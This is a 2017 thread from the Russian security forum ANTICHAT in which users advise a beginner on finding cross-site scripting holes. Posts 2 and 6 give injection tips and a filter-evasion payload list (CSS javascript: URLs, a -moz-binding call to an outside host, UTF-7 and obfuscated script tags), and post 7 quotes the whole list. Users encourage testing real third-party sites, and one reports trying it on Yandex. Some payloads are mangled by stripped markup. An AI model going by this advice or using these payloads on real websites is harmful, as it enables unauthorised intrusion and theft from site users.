HOME    FORUMS    MEMBERS    RECENT POSTS    LOG IN  
Баннер 1   Баннер 2

ANTICHAT — форум по информационной безопасности, OSINT и технологиям

ANTICHAT — русскоязычное сообщество по безопасности, OSINT и программированию. Форум ранее работал на доменах antichat.ru, antichat.com и antichat.club, и теперь снова доступен на новом адресе — forum.antichat.xyz.
Форум восстановлен и продолжает развитие: доступны архивные темы, добавляются новые обсуждения и материалы.
⚠️ Старые аккаунты восстановить невозможно — необходимо зарегистрироваться заново.
Вернуться   Форум АНТИЧАТ > БЕЗОПАСНОСТЬ И УЯЗВИМОСТИ > Песочница
   
Ответ
 
Опции темы Поиск в этой теме Опции просмотра

  #1  
Старый 07.09.2017, 00:39
hells_bells
Guest
Сообщений: n/a
Провел на форуме:
310

Репутация: 0
По умолчанию

Приветствую в моей первой теме!

Если быть кратким, то меня интересует парочка вопросов касательно XSS уязвимости:

- Видел на форуме много тем о XSS, но большинство из них были открыты очень давно(по меркам Web`а), как вы считаете - является ли XSS уязвимость актуальной и по сей день или нет?

- Если же XSS актуальна, можете ли вы поделиться своим опытом поиска уязвимых сайтов?(поверьте, прежде чем задавать этот вопрос сюда, сам перелопатил кучу гору сайтов - безуспешно)
 
Ответить с цитированием

  #2  
Старый 07.09.2017, 00:59
{iddqd}
Guest
Сообщений: n/a
Провел на форуме:
46938

Репутация: 2
По умолчанию

Конечно! таких сайтов дохуя!

Ищи на сайтах формы для ввода каких-то данных и потом ищи их отображение на странице. Лезь в исходный код страницы и ищи как в html выводятся введенные тобой данные.

Если говорить о пассивных xss, то в адресной строке браузера должно быть нечто вроде http://site.com/?search="..."

в качестве параметра подставляй

Код:
Code:
alert()
или сначала тег закрывай "/> а потом алерт()

Active XSS часто встречаются на сайтах, где есть регистрация и личный кабинет. В разные поля можно подставлять алерт, некоторые поля могут выводиться без фильтрации.
 
Ответить с цитированием

  #3  
Старый 07.09.2017, 17:45
tester211
Guest
Сообщений: n/a
Провел на форуме:
510

Репутация: 0
По умолчанию

Это наверное самая интересная штука, которая позволяет что то воровать
 
Ответить с цитированием

  #4  
Старый 26.09.2017, 18:45
brown
Guest
Сообщений: n/a
Провел на форуме:
43449

Репутация: 1
По умолчанию

Где-то слышал что сейчас браузеры лочат ХХС
 
Ответить с цитированием

  #5  
Старый 26.09.2017, 22:47
Logol
Guest
Сообщений: n/a
Провел на форуме:
3742

Репутация: 0
По умолчанию

Цитата:
Сообщение от brown  
brown said:

Где-то слышал что сейчас браузеры лочат ХХС
они не могу его блочить так как для выполнения xss нужен js А БЕЗ сайты не работают)
 
Ответить с цитированием

  #6  
Старый 26.09.2017, 22:49
Logol
Guest
Сообщений: n/a
Провел на форуме:
3742

Репутация: 0
По умолчанию

мой маленький набор

Код:
Code:
'';!--"=&{()}

xxs link

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

xxs link
alert("XSS")">

perl -e 'print "";' > out

alert("XSS");//

alert("XSS");

li {list-style-image: url("javascript:alert('XSS')");}XSS

; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';

alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}

¼script¾alert(¢XSS¢)¼/script¾

cript:alert('XSS')">

cript:alert('XSS')">

alert("XSS")'); ?>
alert('XSS')">
 +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
 
Ответить с цитированием

  #7  
Старый 13.10.2017, 20:15
StarkMP
Guest
Сообщений: n/a
Провел на форуме:
664

Репутация: 0
По умолчанию

Цитата:
Сообщение от Logol  
Logol said:

мой маленький набор
Код:
Code:
'';!--"=&{()}

xxs link

or Chrome loves to replace missing quotes for you... if you ever get stuck just leave them off and Chrome will put them in the right place and fix your missing quotes on a URL or script.

xxs link
alert("XSS")">

perl -e 'print "";' > out

alert("XSS");//

alert("XSS");

li {list-style-image: url("javascript:alert('XSS')");}XSS

; REL=stylesheet">
BODY{-moz-binding:url("http://ha.ckers.org/xssmoz.xml#xss")}
@im\port'\ja\vasc\ript:alert("XSS")';

alert('XSS');
.XSS{background-image:url("javascript:alert('XSS')");}
BODY{background:url("javascript:alert('XSS')")}

¼script¾alert(¢XSS¢)¼/script¾

cript:alert('XSS')">

cript:alert('XSS')">

alert("XSS")'); ?>
alert('XSS')">
 +ADw-SCRIPT+AD4-alert('XSS');+ADw-/SCRIPT+AD4-
Привет. И все вот эти строчки тестировать на разных сайтах? Если вывело уведомление, значит уязвимость есть?
 
Ответить с цитированием

  #8  
Старый 13.10.2017, 20:44
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от StarkMP  
StarkMP said:

Привет. И все вот эти строчки тестировать на разных сайтах? Если вывело уведомление, значит уязвимость есть?
Да, хотя вектора можно ещё придумать
 
Ответить с цитированием

  #9  
Старый 13.10.2017, 20:46
StarkMP
Guest
Сообщений: n/a
Провел на форуме:
664

Репутация: 0
По умолчанию

Цитата:
Сообщение от karkajoi  
karkajoi said:

Да, хотя вектора можно ещё придумать
Я по приколу вставил это в сайт Яндекса, высветилось сообщение 1 раз. Неужели это уязвимость? Как-то даже не верится...
 
Ответить с цитированием

  #10  
Старый 13.10.2017, 21:32
karkajoi
Guest
Сообщений: n/a
Провел на форуме:
96779

Репутация: 5
По умолчанию

Цитата:
Сообщение от StarkMP  
StarkMP said:

Я по приколу вставил это в сайт Яндекса, высветилось сообщение 1 раз. Неужели это уязвимость? Как-то даже не верится...
Возможно, на mail.ru раньше было много, но эксплуатировать сложновато стало, браузеры блочат, надо искать новые вектора и обходы.
 
Ответить с цитированием
Ответ





Здесь присутствуют: 1 (пользователей: 0 , гостей: 1)
 


Быстрый переход




ANTICHAT.XYZ